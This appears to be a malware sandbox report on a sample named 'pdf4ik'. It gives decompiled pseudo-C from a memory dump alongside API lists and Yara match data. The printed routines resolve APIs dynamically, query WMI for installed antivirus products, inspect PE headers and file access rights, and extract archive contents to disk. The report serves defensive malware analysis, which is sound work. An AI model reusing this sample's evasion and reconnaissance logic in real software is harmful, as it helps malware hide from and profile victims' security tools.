                                        					_t43 =  *0x29dd8060; // 0x159a678
                                        					 *0x29dd83f4 = _t20;
                                        					_t21 =  *0x29dd856c; // 0x74ab0000
                                        					_t22 = GetProcAddress(_t21, _t43);
                                        					_t34 =  *0x29dd7b58; // 0x159a528
                                        					_t44 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd84f4 = _t22;
                                        					_t23 = GetProcAddress(_t44, _t34);
                                        					_t35 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd84c8 = _t23;
                                        					_t24 =  *0x29dd8294; // 0x159cb70
                                        					 *0x29dd84f8 = GetProcAddress(_t35, _t24);
                                        				}
                                        				_t36 =  *0x29dd8144; // 0x159a6c0
                                        				_t3 = LoadLibraryA(_t36);
                                        				 *0x29dd8358 = _t3;
                                        				if(_t3 != 0) {
                                        					_t26 =  *0x29dd8064; // 0x159a6f0
                                        					_t4 = GetProcAddress(_t3, _t26);
                                        					 *0x29dd844c = _t4;
                                        					return _t4;
                                        				}
                                        				return _t3;
                                        			}
















































                                        APIs
                                        • LoadLibraryA.KERNEL32(0159A540,29D95175), ref: 29DA8216
                                        • GetProcAddress.KERNEL32(00000000,0159A6A8), ref: 29DA8238
                                        • GetProcAddress.KERNEL32(74AB0000,0159A4F8), ref: 29DA824C
                                        • GetProcAddress.KERNEL32(74AB0000,0159E2C8), ref: 29DA8275
                                        • GetProcAddress.KERNEL32(74AB0000,0159A6D8), ref: 29DA828D
                                        • GetProcAddress.KERNEL32(74AB0000,0159A5D0), ref: 29DA82A6
                                        • GetProcAddress.KERNEL32(74AB0000,0159CAF0), ref: 29DA82BE
                                        • GetProcAddress.KERNEL32(74AB0000,0159CA70), ref: 29DA82D6
                                        • GetProcAddress.KERNEL32(74AB0000,0159A768), ref: 29DA82EF
                                        • GetProcAddress.KERNEL32(74AB0000,0159A720), ref: 29DA8307
                                        • GetProcAddress.KERNEL32(74AB0000,0159A678), ref: 29DA831F
                                        • GetProcAddress.KERNEL32(74AB0000,0159A528), ref: 29DA8338
                                        • GetProcAddress.KERNEL32(74AB0000,0159CB70), ref: 29DA8350
                                        • LoadLibraryA.KERNEL32(0159A6C0), ref: 29DA8363
                                        • GetProcAddress.KERNEL32(00000000,0159A6F0), ref: 29DA837A
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID:
                                        • API String ID: 2238633743-0
                                        • Opcode ID: 23bcea2951dcc3af808f8edb4492ac873226bab1e7f543abdef844d8900604a1
                                        • Instruction ID: 39be5ee635575c55746822568c093d79a7c01908589a5eb477290d6894aa64f3
                                        • Opcode Fuzzy Hash: 23bcea2951dcc3af808f8edb4492ac873226bab1e7f543abdef844d8900604a1
                                        • Instruction Fuzzy Hash: 924142B7990281EFD746FFA5E949D2637BAE758B01710C659E906C3201DA3CA801EFB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CoInitializeEx.OLE32(00000000,00000000,D9555F04,00000010,0000000F,00000000), ref: 29DA3FF8
                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 29DA4009
                                        • CoCreateInstance.OLE32(29DC54F0,00000000,00000001,29DC5420,?), ref: 29DA4023
                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 29DA405C
                                        • VariantInit.OLEAUT32(?), ref: 29DA40CF
                                          • Part of subcall function 29DA48F0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000010,?), ref: 29DA491E
                                          • Part of subcall function 29DA48F0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,29DA410F,00000000,00000000), ref: 29DA494C
                                        • VariantClear.OLEAUT32(?), ref: 29DA4132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharInitializeMultiVariantWide$BlanketClearCreateInitInstanceProxySecurity
                                        • String ID: Select * From AntiVirusProduct$Unknown$WQL$displayName$root\SecurityCenter2
                                        • API String ID: 3162198753-2561087649
                                        • Opcode ID: 2948377d47030a17dbce403a0a5c2a40e12a86a9d10599e7f2187a083140ac1f
                                        • Instruction ID: e888d33b54d9d9b488435889589a3f2b6cde88d7cb6b3ab656991f2e8d15f172
                                        • Opcode Fuzzy Hash: 2948377d47030a17dbce403a0a5c2a40e12a86a9d10599e7f2187a083140ac1f
                                        • Instruction Fuzzy Hash: 74514CB1904249AFEB10DFA4DCC4EAEB77CFB58344F50826DF515AB681C6706D06DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 90%
                                        			E29DABC70(long* __ecx, signed int __edx, void* _a4, signed int* _a8, intOrPtr* _a12) {
                                        				signed int _v12;
                                        				struct _SYSTEMTIME _v28;
                                        				signed int _v56;
                                        				intOrPtr _v64;
                                        				intOrPtr _v72;
                                        				struct _BY_HANDLE_FILE_INFORMATION _v80;
                                        				void _v84;
                                        				long _v88;
                                        				long _v92;
                                        				struct _FILETIME _v100;
                                        				void _v104;
                                        				signed int* _v108;
                                        				void _v112;
                                        				long* _v116;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t56;
                                        				signed char _t61;
                                        				long _t62;
                                        				signed int* _t63;
                                        				long* _t64;
                                        				intOrPtr _t75;
                                        				long _t85;
                                        				void _t89;
                                        				void* _t92;
                                        				signed int _t93;
                                        				signed int _t94;
                                        				signed int _t95;
                                        				long _t96;
                                        				signed int _t99;
                                        				intOrPtr _t111;
                                        				intOrPtr _t134;
                                        				intOrPtr* _t136;
                                        				signed int* _t137;
                                        				void* _t138;
                                        				signed int _t139;
                                        				signed int _t140;
                                        
                                        				_t121 = __edx;
                                        				_t56 =  *0x29dd5664; // 0xd9555f04
                                        				_v12 = _t56 ^ _t140;
                                        				_t138 = _a4;
                                        				_t136 = _a12;
                                        				_v108 = _a8;
                                        				_v116 = __ecx;
                                        				_v100.dwHighDateTime = __edx;
                                        				if(GetFileInformationByHandle(_t138,  &_v80) != 0) {
                                        					_t61 = _v80.dwFileAttributes;
                                        					_t93 = 0;
                                        					_t123 = _t61 & 0x00000001;
                                        					if(_t123 != 0) {
                                        						_t93 = 1;
                                        					}
                                        					if((_t61 & 0x00000002) != 0) {
                                        						_t93 = _t93 | 0x00000002;
                                        					}
                                        					if((_t61 & 0x00000004) != 0) {
                                        						_t93 = _t93 | 0x00000004;
                                        					}
                                        					_t99 = _t61 & 0x00000010;
                                        					if(_t99 != 0) {
                                        						_t93 = _t93 | 0x00000010;
                                        					}
                                        					if((_t61 & 0x00000020) != 0) {
                                        						_t93 = _t93 | 0x00000020;
                                        					}
                                        					if(_t99 == 0) {
                                        						_t94 = _t93 | 0x80000000;
                                        					} else {
                                        						_t94 = _t93 | 0x40000000;
                                        					}
                                        					_t95 = _t94 | 0x01000000;
                                        					if(_t123 == 0) {
                                        						_t95 = _t95 | 0x00800000;
                                        					}
                                        					_t62 = GetFileSize(_t138, 0);
                                        					_v88 = _t62;
                                        					if(_t62 > 0x28) {
                                        						SetFilePointer(_t138, 0, 0, 0);
                                        						ReadFile(_t138,  &_v84, 2,  &_v92, 0);
                                        						SetFilePointer(_t138, 0x24, 0, 0);
                                        						ReadFile(_t138,  &_v112, 4,  &_v92, 0);
                                        						_t123 = 0x54ad;
                                        						if(_v84 == 0x54ad) {
                                        							_t85 = _v112;
                                        							if(_v88 > _t85 + 0x34) {
                                        								SetFilePointer(_t138, _t85, 0, 0);
                                        								_t123 =  &_v92;
                                        								ReadFile(_t138,  &_v104, 4,  &_v92, 0);
                                        								_t89 = _v104;
                                        								if(_t89 == 0x5a4d || _t89 == 0x454e || _t89 == 0x454c || _t89 == 0x4550) {
                                        									_t95 = _t95 | 0x00400000;
                                        								}
                                        							}
                                        						}
                                        					}
                                        					_t63 = _v108;
                                        					if(_t63 != 0) {
                                        						 *_t63 = _t95;
                                        					}
                                        					_t64 = _v116;
                                        					if(_t64 != 0) {
                                        						 *_t64 = _v88;
                                        					}
                                        					_t139 = _v56;
                                        					_t96 = _v80.ftLastWriteTime;
                                        					if(_t136 != 0) {
                                        						_t134 = _v80.ftLastAccessTime - 0xd53e8000;
                                        						asm("sbb eax, 0x19db1de");
                                        						_t75 = E29DB75A0(_t134, _v64, 0x989680, 0);
                                        						 *((intOrPtr*)(_t136 + 4)) = _t134;
                                        						_t123 = _t139;
                                        						asm("sbb edx, 0x19db1de");
                                        						 *_t136 = _t75;
                                        						 *((intOrPtr*)(_t136 + 8)) = E29DB75A0(_t96 - 0xd53e8000, _t123, 0x989680, 0);
                                        						asm("sbb ecx, 0x19db1de");
                                        						 *(_t136 + 0xc) = _t123;
                                        						 *((intOrPtr*)(_t136 + 0x10)) = E29DB75A0(_v80.ftCreationTime - 0xd53e8000, _v72, 0x989680, 0);
                                        						 *(_t136 + 0x14) = _t123;
                                        					}
                                        					_t137 = _v100.dwHighDateTime;
                                        					if(_t137 != 0) {
                                        						_v100.dwLowDateTime = _t96;
                                        						_v100.dwHighDateTime = _t139;
                                        						FileTimeToSystemTime( &_v100,  &_v28);
                                        						_t111 = _v28.wSecond;
                                        						_t123 = _t111 + _t111 & 0x0000001f;
                                        						 *_t137 = ((_v28.wYear + 0xffffffc4 << 0x00000004 | _v28.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v28.wDay & 0x0000001f) << 0x00000010 | (_v28.wMinute & 0x0000003f | _v28.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _t111 + _t111 & 0x0000001f;
                                        					}
                                        					return E29DADF46(0, _t96, _v12 ^ _t140, _t123, _t137, _t139);
                                        				} else {
                                        					return E29DADF46(0x200, _t92, _v12 ^ _t140, _t121, _t136, _t138);
                                        				}
                                        			}









































                                        0x29dabeb9
                                        0x29dabca4
                                        0x29dabcb9
                                        0x29dabcb9

                                        APIs
                                        • GetFileInformationByHandle.KERNEL32(?,?,?,?,?), ref: 29DABC9A
                                        • GetFileSize.KERNEL32(?,00000000), ref: 29DABD0F
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 29DABD28
                                        • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 29DABD3B
                                        • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 29DABD48
                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 29DABD5B
                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 29DABD7D
                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 29DABD90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$PointerRead$HandleInformationSize
                                        • String ID:
                                        • API String ID: 2979504256-0
                                        • Opcode ID: c72c45e71ef319caf1b5322ede8b4dddce4fc2be6e6d74857363f95da7ccc382
                                        • Instruction ID: 2f78d298f79a812af8e3184f81313ec35604e1e1090dfc6b242f92498bf77566
                                        • Opcode Fuzzy Hash: c72c45e71ef319caf1b5322ede8b4dddce4fc2be6e6d74857363f95da7ccc382
                                        • Instruction Fuzzy Hash: 8B716471A002146FEB08DFA4CC95FAEBBB5FF84700F10851DE616EB684D778A912DB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E29D8FFD0(CHAR* __edi, long _a4) {
                                        				signed int _v12;
                                        				struct _GENERIC_MAPPING _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				struct _PRIVILEGE_SET _v48;
                                        				long _v52;
                                        				void* _v56;
                                        				void* _v60;
                                        				int _v64;
                                        				long _v68;
                                        				long _v72;
                                        				void* __ebx;
                                        				void* __esi;
                                        				signed int _t42;
                                        				signed char _t64;
                                        				struct _SECURITY_DESCRIPTOR* _t79;
                                        				signed int _t80;
                                        
                                        				_t78 = __edi;
                                        				_t42 =  *0x29dd5664; // 0xd9555f04
                                        				_v12 = _t42 ^ _t80;
                                        				_t64 = 0;
                                        				_v52 = 0;
                                        				if(GetFileSecurityA(__edi, 7, 0, 0,  &_v52) == 0 && GetLastError() == 0x7a) {
                                        					_t79 = E29DADFE0(_t73, __edi, _t79, _v52);
                                        					if(_t79 != 0) {
                                        						_t73 =  &_v52;
                                        						if(GetFileSecurityA(__edi, 7, _t79, _v52,  &_v52) != 0) {
                                        							_v56 = 0;
                                        							if(OpenProcessToken(GetCurrentProcess(), 0x2000e,  &_v56) != 0) {
                                        								_v60 = 0;
                                        								if(DuplicateToken(_v56, 2,  &_v60) != 0) {
                                        									_v28.GenericWrite = 0;
                                        									_v28.GenericExecute = 0;
                                        									_v28.GenericAll = 0;
                                        									_v48.PrivilegeCount = 0;
                                        									_v48.Control = 0;
                                        									_v48.Privilege = 0;
                                        									_v36 = 0;
                                        									_v32 = 0;
                                        									_v68 = 0;
                                        									_v72 = 0x14;
                                        									_v64 = 0;
                                        									_v28.GenericRead = 0x120089;
                                        									_v28.GenericWrite = 0x120116;
                                        									_v28.GenericExecute = 0x1200a0;
                                        									_v28.GenericAll = 0x1f01ff;
                                        									MapGenericMask( &_a4,  &_v28);
                                        									if(AccessCheck(_t79, _v60, _a4,  &_v28,  &_v48,  &_v72,  &_v68,  &_v64) != 0) {
                                        										_t64 = 0 | _v64 == 0x00000001;
                                        									}
                                        									CloseHandle(_v60);
                                        								}
                                        								_t73 = _v56;
                                        								CloseHandle(_v56);
                                        							}
                                        							E29DADFA6(_t79);
                                        						}
                                        					}
                                        				}
                                        				return E29DADF46(_t64 & 0x000000ff, _t64, _v12 ^ _t80, _t73, _t78, _t79);
                                        			}





















                                        APIs
                                        • GetFileSecurityA.ADVAPI32(?,00000007,00000000,00000000,?), ref: 29D8FFF0
                                        • GetLastError.KERNEL32(?,00000007,00000000,00000000,?), ref: 29D8FFFE
                                        • _malloc.LIBCMT ref: 29D90011
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetFileSecurityA.ADVAPI32(?,00000007,00000000,?,?), ref: 29D9002F
                                        • GetCurrentProcess.KERNEL32(0002000E,?,?,00000007,00000000,?,?), ref: 29D90049
                                        • OpenProcessToken.ADVAPI32(00000000,?,00000007,00000000,?,?), ref: 29D90050
                                        • DuplicateToken.ADVAPI32(?,00000002,?,?,00000007,00000000,?,?), ref: 29D9006B
                                        • MapGenericMask.ADVAPI32(?,?,?,00000007,00000000,?,?), ref: 29D900C4
                                        • AccessCheck.ADVAPI32(00000000,?,?,00120089,?,00000014,?,?,?,00000007,00000000,?,?), ref: 29D900E7
                                        • CloseHandle.KERNEL32(?,?,00000007,00000000,?,?), ref: 29D900FC
                                        • CloseHandle.KERNEL32(?,?,00000007,00000000,?,?), ref: 29D90106
                                        • _free.LIBCMT ref: 29D9010D
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseFileHandleProcessSecurityToken$AccessAllocateCheckCurrentDuplicateErrorGenericHeapLastMaskOpen_free_malloc
                                        • String ID:
                                        • API String ID: 1304225167-0
                                        • Opcode ID: 2ea3ad2a3dacac2498bde7f10ad4e2254cb3e0c71697bf2a2db0d8f0a74e2060
                                        • Instruction ID: d0e074c137ad244d6b7ceb70c54084cc4086f7a8b5dded5c28d4de97eba48926
                                        • Opcode Fuzzy Hash: 2ea3ad2a3dacac2498bde7f10ad4e2254cb3e0c71697bf2a2db0d8f0a74e2060
                                        • Instruction Fuzzy Hash: 4A4106B2D10249AFDB04EFA5E9859EEBBB8FF48744F00811DF505E7100EB749A05DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 91%
                                        			E29D8DF30(long __ecx, void* __edx, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16) {
                                        				signed int _v8;
                                        				char _v275;
                                        				char _v276;
                                        				char _v540;
                                        				struct _FILETIME _v560;
                                        				struct _FILETIME _v568;
                                        				struct _FILETIME _v576;
                                        				unsigned int _v580;
                                        				char _v844;
                                        				char _v845;
                                        				signed int _v852;
                                        				long _v856;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t108;
                                        				intOrPtr _t111;
                                        				signed int _t124;
                                        				signed int* _t128;
                                        				intOrPtr _t131;
                                        				signed int _t134;
                                        				signed int _t136;
                                        				signed int _t139;
                                        				signed int _t140;
                                        				signed int _t142;
                                        				signed int _t145;
                                        				signed int _t160;
                                        				void* _t161;
                                        				intOrPtr _t167;
                                        				signed int _t170;
                                        				signed int _t172;
                                        				signed int* _t175;
                                        				intOrPtr* _t178;
                                        				signed int _t190;
                                        				signed int _t195;
                                        				signed int _t206;
                                        				void* _t210;
                                        				signed int _t213;
                                        				long _t225;
                                        				signed int _t227;
                                        				signed int _t229;
                                        				signed int _t230;
                                        				signed int _t232;
                                        				void* _t233;
                                        				signed int _t234;
                                        				signed int _t236;
                                        				void* _t237;
                                        				void* _t239;
                                        				void* _t240;
                                        
                                        				_t210 = __edx;
                                        				_t179 = __ecx;
                                        				_t108 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t108 ^ _t236;
                                        				_t229 = _a16;
                                        				_t175 = __ecx;
                                        				_v856 = __ecx;
                                        				_v852 = _a8;
                                        				if(_t229 == 3) {
                                        					_t111 =  *((intOrPtr*)(__ecx + 4));
                                        					_t229 = _a4;
                                        					__eflags = _t229 - _t111;
                                        					if(_t229 == _t111) {
                                        						L17:
                                        						_t211 = _v852;
                                        						_t181 = _a12;
                                        						_t229 = E29D8D3D0( *_t175, _a12, _v852,  &_v845);
                                        						__eflags = _t229;
                                        						if(_t229 <= 0) {
                                        							_t224 =  *_t175;
                                        							E29D8D630(_t181,  *_t175);
                                        							_t175[1] = 0xffffffff;
                                        						}
                                        						__eflags = _v845;
                                        						if(_v845 == 0) {
                                        							__eflags = _t229;
                                        							if(_t229 <= 0) {
                                        								_t41 = _t229 + 0x6a; // 0x6a
                                        								asm("sbb eax, eax");
                                        								__eflags = _v8 ^ _t236;
                                        								return E29DADF46(( ~_t41 & 0x04fff000) + 0x1000, _t175, _v8 ^ _t236, _t211, _t224, _t229);
                                        							} else {
                                        								__eflags = _v8 ^ _t236;
                                        								return E29DADF46(0x600, _t175, _v8 ^ _t236, _t211, _t224, _t229);
                                        							}
                                        						} else {
                                        							goto L20;
                                        						}
                                        					} else {
                                        						__eflags = _t111 - 0xffffffff;
                                        						if(_t111 != 0xffffffff) {
                                        							_t224 =  *__ecx;
                                        							E29D8D630(__ecx,  *__ecx);
                                        						}
                                        						_t124 =  *_t175;
                                        						_t175[1] = 0xffffffff;
                                        						__eflags = _t229 -  *((intOrPtr*)(_t124 + 4));
                                        						if(_t229 >=  *((intOrPtr*)(_t124 + 4))) {
                                        							goto L3;
                                        						} else {
                                        							__eflags = _t229 -  *((intOrPtr*)(_t124 + 0x10));
                                        							if(_t229 <  *((intOrPtr*)(_t124 + 0x10))) {
                                        								E29D8CE10(_t124);
                                        								_t229 = _a4;
                                        							}
                                        							_t190 =  *_t175;
                                        							__eflags =  *((intOrPtr*)(_t190 + 0x10)) - _t229;
                                        							if( *((intOrPtr*)(_t190 + 0x10)) < _t229) {
                                        								do {
                                        									_t230 =  *_t175;
                                        									__eflags = _t230;
                                        									if(_t230 != 0) {
                                        										__eflags =  *(_t230 + 0x18);
                                        										if( *(_t230 + 0x18) != 0) {
                                        											_t131 =  *((intOrPtr*)(_t230 + 0x10)) + 1;
                                        											__eflags = _t131 -  *((intOrPtr*)(_t230 + 4));
                                        											if(_t131 !=  *((intOrPtr*)(_t230 + 4))) {
                                        												 *((intOrPtr*)(_t230 + 0x10)) = _t131;
                                        												 *((intOrPtr*)(_t230 + 0x14)) =  *((intOrPtr*)(_t230 + 0x14)) +  *((intOrPtr*)(_t230 + 0x50)) +  *((intOrPtr*)(_t230 + 0x4c)) +  *((intOrPtr*)(_t230 + 0x48)) + 0x2e;
                                        												_t134 = E29D8CA10(_t230, _t230 + 0x28, _t230 + 0x78, 0, 0);
                                        												_t237 = _t237 + 0x10;
                                        												asm("sbb eax, eax");
                                        												_t136 =  ~_t134 + 1;
                                        												__eflags = _t136;
                                        												 *(_t230 + 0x18) = _t136;
                                        											}
                                        										}
                                        									}
                                        									_t213 =  *_t175;
                                        									__eflags =  *((intOrPtr*)(_t213 + 0x10)) - _a4;
                                        								} while ( *((intOrPtr*)(_t213 + 0x10)) < _a4);
                                        							}
                                        							E29D8D260( *_t175, _t175[0x4e], _t175[0x4e]);
                                        							_t128 = _v856;
                                        							_t237 = _t237 + 4;
                                        							_t128[1] = _a4;
                                        							_t175 = _t128;
                                        							goto L17;
                                        						}
                                        					}
                                        				} else {
                                        					if(_t229 == 2 || _t229 == 1) {
                                        						__eflags = _t175[1] - 0xffffffff;
                                        						if(_t175[1] != 0xffffffff) {
                                        							E29D8D630(_t179,  *_t175);
                                        						}
                                        						_t139 =  *_t175;
                                        						_t224 = _a4;
                                        						_t175[1] = 0xffffffff;
                                        						__eflags = _t224 -  *((intOrPtr*)(_t139 + 4));
                                        						if(_t224 >=  *((intOrPtr*)(_t139 + 4))) {
                                        							goto L3;
                                        						} else {
                                        							__eflags = _t224 -  *((intOrPtr*)(_t139 + 0x10));
                                        							if(_t224 <  *((intOrPtr*)(_t139 + 0x10))) {
                                        								E29D8CE10(_t139);
                                        								_t229 = _a16;
                                        							}
                                        							_t140 =  *_t175;
                                        							__eflags =  *((intOrPtr*)(_t140 + 0x10)) - _t224;
                                        							if( *((intOrPtr*)(_t140 + 0x10)) < _t224) {
                                        								do {
                                        									_t234 =  *_t175;
                                        									__eflags = _t234;
                                        									if(_t234 != 0) {
                                        										__eflags =  *(_t234 + 0x18);
                                        										if( *(_t234 + 0x18) != 0) {
                                        											_t167 =  *((intOrPtr*)(_t234 + 0x10)) + 1;
                                        											__eflags = _t167 -  *((intOrPtr*)(_t234 + 4));
                                        											if(_t167 !=  *((intOrPtr*)(_t234 + 4))) {
                                        												 *((intOrPtr*)(_t234 + 0x14)) =  *((intOrPtr*)(_t234 + 0x14)) +  *((intOrPtr*)(_t234 + 0x50)) +  *((intOrPtr*)(_t234 + 0x4c)) +  *((intOrPtr*)(_t234 + 0x48)) + 0x2e;
                                        												 *((intOrPtr*)(_t234 + 0x10)) = _t167;
                                        												_t170 = E29D8CA10(_t234, _t234 + 0x28, _t234 + 0x78, 0, 0);
                                        												_t237 = _t237 + 0x10;
                                        												asm("sbb eax, eax");
                                        												_t172 =  ~_t170 + 1;
                                        												__eflags = _t172;
                                        												 *(_t234 + 0x18) = _t172;
                                        											}
                                        										}
                                        									}
                                        									_t206 =  *_t175;
                                        									__eflags =  *((intOrPtr*)(_t206 + 0x10)) - _t224;
                                        								} while ( *((intOrPtr*)(_t206 + 0x10)) < _t224);
                                        								_t229 = _a16;
                                        							}
                                        							_t194 = _t175;
                                        							E29D8D7B0(_t175,  &_v844, _t224);
                                        							_t211 = _v580 >> 4;
                                        							__eflags = _t211 & 0x00000001;
                                        							if((_t211 & 0x00000001) != 0) {
                                        								L20:
                                        								__eflags = _v8 ^ _t236;
                                        								return E29DADF46(0, _t175, _v8 ^ _t236, _t211, _t224, _t229);
                                        							} else {
                                        								_v540 = 0;
                                        								__eflags = _t229 - 1;
                                        								if(_t229 != 1) {
                                        									_t224 = _v852;
                                        									_t232 = _t224;
                                        									_t142 =  *_t232;
                                        									_t195 = _t232;
                                        									__eflags = _t142;
                                        									while(_t142 != 0) {
                                        										__eflags = _t142 - 0x2f;
                                        										if(_t142 == 0x2f) {
                                        											L43:
                                        											_t224 = _t195 + 1;
                                        										} else {
                                        											__eflags = _t142 - 0x5c;
                                        											if(_t142 == 0x5c) {
                                        												goto L43;
                                        											}
                                        										}
                                        										_t142 =  *(_t195 + 1);
                                        										_t195 = _t195 + 1;
                                        										__eflags = _t142;
                                        									}
                                        									E29DAE8E8( &_v276, _t232, 0x104);
                                        									_t239 = _t237 + 0xc;
                                        									__eflags = _t224 - _t232;
                                        									if(_t224 != _t232) {
                                        										 *((char*)(_t236 + _t224 - _t232 - 0x110)) = 0;
                                        										_t145 = _v276;
                                        										__eflags = _t145 - 0x2f;
                                        										if(_t145 == 0x2f) {
                                        											L55:
                                        											wsprintfA( &_v540, "%s%s",  &_v276, _t224);
                                        											_t237 = _t239 + 0x10;
                                        											goto L48;
                                        										} else {
                                        											__eflags = _t145 - 0x5c;
                                        											if(_t145 == 0x5c) {
                                        												goto L55;
                                        											} else {
                                        												__eflags = _t145;
                                        												if(_t145 == 0) {
                                        													goto L47;
                                        												} else {
                                        													__eflags = _v275 - 0x3a;
                                        													if(_v275 != 0x3a) {
                                        														goto L47;
                                        													} else {
                                        														goto L55;
                                        													}
                                        												}
                                        											}
                                        										}
                                        										goto L73;
                                        									} else {
                                        										_v276 = 0;
                                        										L47:
                                        										wsprintfA( &_v540, "%s%s%s",  &(_t175[0x50]),  &_v276, _t224);
                                        										_t237 = _t239 + 0x14;
                                        									}
                                        									L48:
                                        									_t194 = _v580;
                                        									_t211 =  &_v540;
                                        									_t233 = CreateFileA( &_v540, 0x40000000, 0, 0, 2, _v580, 0);
                                        								} else {
                                        									_t233 = _v852;
                                        								}
                                        								__eflags = _t233 - 0xffffffff;
                                        								if(_t233 != 0xffffffff) {
                                        									E29D8D260( *_t175, _t194, _t175[0x4e]);
                                        									_t178 = _v856;
                                        									_t240 = _t237 + 4;
                                        									__eflags =  *(_t178 + 0x13c);
                                        									if(__eflags == 0) {
                                        										_t161 = E29DAD4FB(_t178, _t211, _t224, _t233, __eflags, 0x4000);
                                        										_t240 = _t240 + 4;
                                        										 *(_t178 + 0x13c) = _t161;
                                        									}
                                        									_v852 = 0;
                                        									while(1) {
                                        										_t220 =  *(_t178 + 0x13c);
                                        										_t199 = 0x4000;
                                        										_t225 = E29D8D3D0( *_t178, 0x4000,  *(_t178 + 0x13c),  &_v845);
                                        										_t240 = _t240 + 8;
                                        										__eflags = _t225 - 0xffffff96;
                                        										if(_t225 == 0xffffff96) {
                                        											break;
                                        										}
                                        										__eflags = _t225;
                                        										if(__eflags < 0) {
                                        											L65:
                                        											_v852 = 0x5000000;
                                        										} else {
                                        											if(__eflags <= 0) {
                                        												L63:
                                        												__eflags = _v845;
                                        												if(_v845 == 0) {
                                        													__eflags = _t225;
                                        													if(_t225 != 0) {
                                        														continue;
                                        													} else {
                                        														goto L65;
                                        													}
                                        												}
                                        											} else {
                                        												_t199 =  *(_t178 + 0x13c);
                                        												_t160 = WriteFile(_t233,  *(_t178 + 0x13c), _t225,  &_v856, 0);
                                        												__eflags = _t160;
                                        												if(_t160 == 0) {
                                        													_v852 = 0x400;
                                        												} else {
                                        													goto L63;
                                        												}
                                        											}
                                        										}
                                        										L66:
                                        										E29D8D630(_t199,  *_t178);
                                        										_t227 = _v852;
                                        										__eflags = _t227;
                                        										if(_t227 == 0) {
                                        											_t220 =  &_v560;
                                        											SetFileTime(_t233,  &_v568,  &_v576,  &_v560);
                                        										}
                                        										__eflags = _a16 - 1;
                                        										if(_a16 != 1) {
                                        											CloseHandle(_t233);
                                        										}
                                        										__eflags = _v8 ^ _t236;
                                        										return E29DADF46(_t227, _t178, _v8 ^ _t236, _t220, _t227, _t233);
                                        										goto L73;
                                        									}
                                        									_v852 = 0x1000;
                                        									goto L66;
                                        								} else {
                                        									__eflags = _v8 ^ _t236;
                                        									return E29DADF46(0x200, _t175, _v8 ^ _t236, _t211, _t224, _t233);
                                        								}
                                        							}
                                        						}
                                        					} else {
                                        						L3:
                                        						return E29DADF46(0x10000, _t175, _v8 ^ _t236, _t210, _t224, _t229);
                                        					}
                                        				}
                                        				L73:
                                        			}


                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: %s%s$%s%s%s$:
                                        • API String ID: 0-3034790606
                                        • Opcode ID: b0272df633d7703d65c95529dae13e44ec7d6c89422596cbf97398680605a4d9
                                        • Instruction ID: eea8014071fea52d4f662444fceb6af8bd369515bdad74c8f11c1d018c0372e3
                                        • Opcode Fuzzy Hash: b0272df633d7703d65c95529dae13e44ec7d6c89422596cbf97398680605a4d9
                                        • Instruction Fuzzy Hash: D8D107729002189BCB25DF64C880BEA73B5FF45310F04469DE9599B682D770AE87DFB1
                                        Uniqueness

